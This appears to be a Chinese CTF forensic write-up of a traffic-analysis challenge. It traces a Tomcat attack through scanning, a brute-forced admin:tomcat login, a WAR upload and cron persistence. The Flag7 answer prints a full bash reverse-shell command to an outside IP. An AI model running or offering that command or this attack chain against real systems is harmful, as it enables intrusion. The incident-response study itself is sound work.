玄机-第六章 流量特征分析-常见攻击事件 tomcat的测试报告

目录

一、测试环境

二、测试目的

三、操作过程

Flag1

Flag2

Flag3

Flag4

Flag5

Flag6

Flag7

四、结论


一、测试环境

靶场介绍:国内厂商设置的玄机靶场,以应急响应题目著名。

地址:https://xj.edisec.net/challenges/50

靶机简介:

二、测试目的

根据题目要求,找出对应的flag提交,熟悉溯源的黑客遗留信息,还原攻击流程。

三、操作过程

Flag1

过滤http协议,可以看到源IP:14.0.0.120访问了很多不同的路径,都是404响应值,是目录扫描的流量

过滤tcp协议,也可以看到,访问了很多端口,是端口扫描的流量

Flag1:flag{14.0.0.120}

Flag2

通过IP定位可以查到其地址是广州

Flag2:flag{guangzhou}

Flag3

过滤http流量,并筛选掉404的目录扫描流量

可以看到很多访问,包括admin、tomcat、manager,都是8080端口提供的服务,推测该端口就是web服务器管理面板服务

Flag3:flag{8080}

Flag4

查看http流量包内容,可以在User-Agent中看到gobuster的字样,使用的就是该工具

Flag4:flag{gobuster}

Flag5

根据暴力破解登录的特征,有很多未成功的流量,状态码是401

分析流量包中的401状态码,可以看到这里最后爆破成功,返回200的登录成功信息。在数据包中找到base64的加密认证:YWRtaW46dG9tY2F0

解密得到登录成功的账号和密码信息admin:tomcat

Flag5:flag{admin-tomcat}

Flag6

在登录成功的流量包后面发现了上传文件的流量,并在数据包中找到文件名:JXQOZY.war

Flag6:flag{JXQOZY.war}

Flag7

题目描述是要找权限维持的操作,根据提示,猜测是计划任务

那么可以通过反弹shell的特征寻找,查找到计划任务的反弹shell

bash 复制代码
tcp contains "/bin"

Flag7:flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}

四、结论

根据攻击者遗留的信息,还原出攻击流程。通过暴力破解成功登录,上传恶意文件,写入计划任务。

相关推荐
Johny_Zhao6 小时前
阿里云平台健康检查巡检清单-运维篇
linux·网络安全·阿里云·信息安全·云计算·shell·系统运维
芯盾时代15 小时前
芯盾时代受邀出席安全可信数据要素交易流通利用研讨会
安全·网络安全·数据安全·芯盾时代
网安Ruler17 小时前
Web开发-PHP应用&原生语法&全局变量&数据接受&身份验证&变量覆盖&任意上传(代码审计案例)
网络·安全·网络安全·渗透·红队
光军oi17 小时前
Javaweb————Apache Tomcat服务器介绍及Windows,Linux,MAC三种系统搭建Apache Tomcat
服务器·tomcat·apache
孟婆来包棒棒糖~20 小时前
Docker快速入门
运维·spring boot·docker·容器·tomcat
wb1891 天前
企业WEB应用服务器TOMCAT
运维·前端·笔记·tomcat·云计算
JQLvopkk1 天前
Web安全学习步骤
网络安全
网安Ruler1 天前
Web开发-PHP应用&Cookie脆弱&Session固定&Token唯一&身份验证&数据库通讯
前端·数据库·网络安全·php·渗透·红队
编程到天明1 天前
CTF实战:用Sqlmap破解表单输入型SQL注入题(输入账号密码/username&password)
sql·网络安全·web
m0_738120722 天前
Solar月赛(应急响应)——攻击者使用什么漏洞获取了服务器的配置文件?
运维·服务器·安全·web安全·网络安全